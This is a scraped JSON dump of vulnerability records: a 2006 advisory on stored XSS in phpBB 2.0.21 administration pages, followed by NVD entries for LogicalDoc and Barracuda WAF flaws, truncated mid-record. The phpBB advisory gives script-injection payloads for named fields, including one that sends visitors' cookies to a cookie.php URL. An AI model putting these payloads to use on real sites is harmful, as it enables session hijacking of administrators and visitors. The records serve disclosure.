{"id": "SECURITYVULNS:DOC:13542", "bulletinFamily": "software", "title": "XSS phpBB 2.0.21 in administration", "description": "phpBB 2.0.21 XSS in administration\r\n**********************************\r\n\r\n//-- By Blwood [renatrix@gmail.com]\r\n//-- [ http://www.blwood.net ]\r\n//-- \r\n\r\nStyle Admin\r\n-----------\r\n\r\nManagement & Create a theme\r\n\r\nLots of input are not properly "filtrate" like style_name, head_stylesheet, body_background, tr_color1_name (all the input in simple name)...\r\n\r\nWe cand ofcourse inject html in this way : "><h1>Owned by Blwood :P</h1> \r\nbut it's more interresting to inject javascript :) : \r\n"><body onload="alert('Owned by Blwood')"> => style_name\r\n"><script>alert('Owned by Blwood')</script> => head_stylesheet, body_background, ...\r\nWhen an admin will go in Style Administration he will be Owned. (inject in style_name)\r\nWhen an admin will edit a them he will be Owned.\r\n\r\n\r\nGroup Administration\r\n--------------------\r\n\r\nManagement\r\n\r\nInput group_description is not correctly "filtrated" we can inject js like this : "><script>alert('Owned by Blwood')</script> or </textare>"><script>alert('Owned by Blwood')</script>\r\nWhen an admin will go in Group administration he'll be owned. But what's more, the groups can be seen in groupcp.php \r\nby every visitors.\r\nAn exploit could be : \r\n</textarea>"><script>document.location='http://127.0.0.1/cookie.php?'+document.cookie</script>\r\nor\r\n</textarea>"><script>document.location='http://site.com/ownedpage.html'</script>\r\n\r\nRanks\r\n-----\r\n\r\nRank Administration\r\n\r\nRank Title (input title) is not correctly filtrated, we can inject js like : "><script>alert('xss')</script>\r\nBut what's interresting, if you give this rank to an user, the rank will appear in user's topics and the code will be executed when someone sees a topic :)\r\nNow you can inject what you want but maximum 40 caracters...\r\n\r\n\r\n\r\nSmilies\r\n-------\r\n\r\nSmiles Editing Utility\r\n\r\nSmiley Code : "><body onload="alert('Owned by Blwood')">\r\n\r\nConfiguration\r\n-------------\r\n\r\nGeneral Configuartion\r\n\r\nInputs are not correctyle filtrated : Ex : allow_html_tags => "><script>alert('Owned by Blwood')</script>\r\n\r\n\r\n\r\n[ Video ]\r\n\r\nhttp://www.blwood.net/advisory/phpbb2021xssadmin.rar\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "published": "2006-07-24T00:00:00", "modified": "2006-07-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13542", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:18", "edition": 1, "viewCount": 138, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-08-31T11:10:18", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB2526297", "KB2501721", "KB317244", "KB980408", "KB981401", "KB2785908", "KB953331", "KB2510690", "KB3191913", "KB2874216"]}], "modified": "2018-08-31T11:10:18", "rev": 2}, "vulnersScore": 0.5}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}

{"cve": [{"id": "CVE-2020-13542", "bulletinFamily": "NVD", "title": "CVE-2020-13542", "description": "A local privilege elevation vulnerability exists in the file system permissions of LogicalDoc 8.5.1 installation. Depending on the vector chosen, an attacker can either replace the service binary or replace DLL files loaded by the service, both which get executed by a service thus executing arbitrary commands with System privileges.", "published": "2020-12-03T17:15:00", "modified": "2020-12-07T18:40:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13542", "reporter": "talos-cna@cisco.com", "references": ["https://talosintelligence.com/vulnerability_reports/TALOS-2020-1154"], "cvelist": ["CVE-2020-13542"], "type": "cve", "lastseen": "2021-04-23T01:09:35", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2020-13542"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "A local privilege elevation vulnerability exists in the file system permissions of LogicalDoc 8.5.1 installation. Depending on the vector chosen, an attacker can either replace the service binary or replace DLL files loaded by the service, both which get executed by a service thus executing arbitrary commands with System privileges.", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-12-04T12:28:23", "references": [{"idList": ["TALOS-2020-1154"], "type": "talos"}], "rev": 2}, "score": {"modified": "2020-12-04T12:28:23", "rev": 2, "value": 4.5, "vector": "NONE"}}, "hash": "fcc1d453ba490eb009b6292119355b47c41315329d787e998b664aa63b438100", "hashmap": [{"hash": "d64a84f9b50898db3aa28d1a1eeb8266", "key": "title"}, {"hash": "c28391174bd0da08550e7ba72ec97cfd", "key": "published"}, {"hash": "fef7fa539358cb9e9166e70f7cdaf607", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "06c06f80b5e4d7392121c64ea4a80910", "key": "modified"}, {"hash": "d654e06061e52a004438eb198f65d5d3", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "dba86099b307293f9e4f0c7247e7dde9", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5fb87ea0d192588511f7748d1bcb7c53", "key": "description"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13542", "id": "CVE-2020-13542", "lastseen": "2020-12-04T12:28:23", "modified": "2020-12-03T17:23:00", "objectVersion": "1.3", "published": "2020-12-03T17:15:00", "references": ["https://talosintelligence.com/vulnerability_reports/TALOS-2020-1154"], "reporter": "cve@mitre.org", "title": "CVE-2020-13542", "type": "cve", "viewCount": 7}, "differentElements": ["cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2020-12-04T12:28:23"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "logicaldoc:logicaldoc", "name": "logicaldoc", "operator": "eq", "version": "8.5.1"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:logicaldoc:logicaldoc:8.5.1"], "cpe23": ["cpe:2.3:a:logicaldoc:logicaldoc:8.5.1:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:logicaldoc:logicaldoc:8.5.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-13542"], "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-276"], "description": "A local privilege elevation vulnerability exists in the file system permissions of LogicalDoc 8.5.1 installation. Depending on the vector chosen, an attacker can either replace the service binary or replace DLL files loaded by the service, both which get executed by a service thus executing arbitrary commands with System privileges.", "edition": 3, "enchantments": {"dependencies": {"modified": "2021-02-02T07:36:58", "references": [{"idList": ["TALOS-2020-1154"], "type": "talos"}], "rev": 2}, "score": {"modified": "2021-02-02T07:36:58", "rev": 2, "value": 4.5, "vector": "NONE"}}, "extraReferences": [{"name": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1154", "refsource": "MISC", "tags": ["Third Party Advisory", "Technical Description", "Exploit"], "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1154"}], "hash": "012830349cbf313e22adfe5ca4575aad75717c3b3d6fb09355d3270a437e231b", "hashmap": [{"hash": "ed300558c2b34f4a74248c7939dd81ef", "key": "cpe"}, {"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d64a84f9b50898db3aa28d1a1eeb8266", "key": "title"}, {"hash": "c28391174bd0da08550e7ba72ec97cfd", "key": "published"}, {"hash": "d41a598b821e6706682737b02b2cc97d", "key": "affectedSoftware"}, {"hash": "fef7fa539358cb9e9166e70f7cdaf607", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0991dc6a71834bcd15d758c20894c540", "key": "extraReferences"}, {"hash": "d654e06061e52a004438eb198f65d5d3", "key": "references"}, {"hash": "2fb9beb4f13d63e7ea172b7bb0fa9e60", "key": "cpeConfiguration"}, {"hash": "912963c5a5069f33e89eaadd15a45a54", "key": "cvss2"}, {"hash": "fb07d3882bbb1c3f8e818bbd67fad422", "key": "cwe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "dba86099b307293f9e4f0c7247e7dde9", "key": "href"}, {"hash": "17080ecaaa2efd9c82d40c8ced4c417a", "key": "cpe23"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5fb87ea0d192588511f7748d1bcb7c53", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "0a5d53d19fa397de191db1069c08df4f", "key": "modified"}, {"hash": "f74481c4d3fb2a622ac8c8a438ded811", "key": "cvss"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13542", "id": "CVE-2020-13542", "immutableFields": [], "lastseen": "2021-02-02T07:36:58", "modified": "2020-12-07T18:40:00", "objectVersion": "1.5", "published": "2020-12-03T17:15:00", "references": ["https://talosintelligence.com/vulnerability_reports/TALOS-2020-1154"], "reporter": "cve@mitre.org", "title": "CVE-2020-13542", "type": "cve", "viewCount": 9}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 3, "lastseen": "2021-02-02T07:36:58"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "logicaldoc:logicaldoc", "name": "logicaldoc", "operator": "eq", "version": "8.5.1"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:logicaldoc:logicaldoc:8.5.1"], "cpe23": ["cpe:2.3:a:logicaldoc:logicaldoc:8.5.1:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:logicaldoc:logicaldoc:8.5.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-13542"], "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-276"], "description": "A local privilege elevation vulnerability exists in the file system permissions of LogicalDoc 8.5.1 installation. Depending on the vector chosen, an attacker can either replace the service binary or replace DLL files loaded by the service, both which get executed by a service thus executing arbitrary commands with System privileges.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-12-08T13:18:38", "references": [{"idList": ["TALOS-2020-1154"], "type": "talos"}], "rev": 2}, "score": {"modified": "2020-12-08T13:18:38", "rev": 2, "value": 4.5, "vector": "NONE"}}, "extraReferences": [], "hash": "bf4f682040deede8cb8327dc02344f2b9941f29b61ee8a22ab01085f1e62d05a", "hashmap": [{"hash": "ed300558c2b34f4a74248c7939dd81ef", "key": "cpe"}, {"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "d64a84f9b50898db3aa28d1a1eeb8266", "key": "title"}, {"hash": "c28391174bd0da08550e7ba72ec97cfd", "key": "published"}, {"hash": "d41a598b821e6706682737b02b2cc97d", "key": "affectedSoftware"}, {"hash": "fef7fa539358cb9e9166e70f7cdaf607", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "d654e06061e52a004438eb198f65d5d3", "key": "references"}, {"hash": "2fb9beb4f13d63e7ea172b7bb0fa9e60", "key": "cpeConfiguration"}, {"hash": "912963c5a5069f33e89eaadd15a45a54", "key": "cvss2"}, {"hash": "fb07d3882bbb1c3f8e818bbd67fad422", "key": "cwe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "dba86099b307293f9e4f0c7247e7dde9", "key": "href"}, {"hash": "17080ecaaa2efd9c82d40c8ced4c417a", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5fb87ea0d192588511f7748d1bcb7c53", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "0a5d53d19fa397de191db1069c08df4f", "key": "modified"}, {"hash": "f74481c4d3fb2a622ac8c8a438ded811", "key": "cvss"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13542", "id": "CVE-2020-13542", "lastseen": "2020-12-08T13:18:38", "modified": "2020-12-07T18:40:00", "objectVersion": "1.3", "published": "2020-12-03T17:15:00", "references": ["https://talosintelligence.com/vulnerability_reports/TALOS-2020-1154"], "reporter": "cve@mitre.org", "title": "CVE-2020-13542", "type": "cve", "viewCount": 8}, "differentElements": ["extraReferences"], "edition": 2, "lastseen": "2020-12-08T13:18:38"}], "edition": 4, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "d41a598b821e6706682737b02b2cc97d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "ed300558c2b34f4a74248c7939dd81ef"}, {"key": "cpe23", "hash": "17080ecaaa2efd9c82d40c8ced4c417a"}, {"key": "cpeConfiguration", "hash": "34d88db5934aad401b42447e938a4862"}, {"key": "cvelist", "hash": "fef7fa539358cb9e9166e70f7cdaf607"}, {"key": "cvss", "hash": "f74481c4d3fb2a622ac8c8a438ded811"}, {"key": "cvss2", "hash": "912963c5a5069f33e89eaadd15a45a54"}, {"key": "cvss3", "hash": "beb519effad5780952ea4ce1697a49ad"}, {"key": "cwe", "hash": "fb07d3882bbb1c3f8e818bbd67fad422"}, {"key": "description", "hash": "5fb87ea0d192588511f7748d1bcb7c53"}, {"key": "extraReferences", "hash": "0991dc6a71834bcd15d758c20894c540"}, {"key": "href", "hash": "dba86099b307293f9e4f0c7247e7dde9"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "0a5d53d19fa397de191db1069c08df4f"}, {"key": "published", "hash": "c28391174bd0da08550e7ba72ec97cfd"}, {"key": "references", "hash": "d654e06061e52a004438eb198f65d5d3"}, {"key": "reporter", "hash": "902ce3113d3d89e1d92e6853b7fd48b7"}, {"key": "title", "hash": "d64a84f9b50898db3aa28d1a1eeb8266"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "c42659de61e845181368ac5a3e0f515ed3540e4a18f5d8ca6ad67026fcb66faf", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "talos", "idList": ["TALOS-2020-1154"]}], "modified": "2021-04-23T01:09:35", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-04-23T01:09:35", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:logicaldoc:logicaldoc:8.5.1"], "affectedSoftware": [{"cpeName": "logicaldoc:logicaldoc", "name": "logicaldoc", "operator": "eq", "version": "8.5.1"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:logicaldoc:logicaldoc:8.5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:logicaldoc:logicaldoc:8.5.1:*:*:*:*:*:*:*"], "cwe": ["CWE-276"], "scheme": null, "extraReferences": [{"name": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1154", "refsource": "MISC", "tags": ["Third Party Advisory", "Technical Description", "Exploit"], "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1154"}], "immutableFields": []}, {"bulletinFamily": "NVD", "hash": "6a0ace8cdb63863b470e6561269f441d83851201520bc6a55e7930a925c15e3a", "id": "CVE-2014-2595", "lastseen": "2021-04-22T23:44:08", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "cvelist": ["CVE-2014-2595"], "viewCount": 73, "modified": "2020-02-20T15:55:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "edition": 8, "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "history": [{"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-13T14:29:47", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-13T14:29:47", "value": 6.9, "vector": "NONE"}}, "hash": "0d148bb322c927927cf5c8adaba4daf0d811bf2bee4917f93ca62ca2f942333e", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "23075837e6c728c8f0077b2ae5d5ee7f", "key": "modified"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-13T14:29:47", "modified": "2020-02-12T13:07:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["cpe23", "cvss", "cvss2", "modified", "cpe", "cwe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-13T14:29:47"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-02-12T14:27:29", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-12T14:27:29", "value": 6.9, "vector": "NONE"}}, "hash": "6ccf8f84237981876cda9914b348e4e11c8972875cdf630f59422732f1ea69ba", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-12T14:27:29", "modified": "2020-02-12T01:15:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["modified"], "edition": 2, "lastseen": "2020-02-12T14:27:29"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-10-03T12:01:15", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-10-03T12:01:15", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [], "hash": "65fabd8c3b92ccbba797b3dfba517234b9e0e8bc2464531f2cd64047dd457870", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": 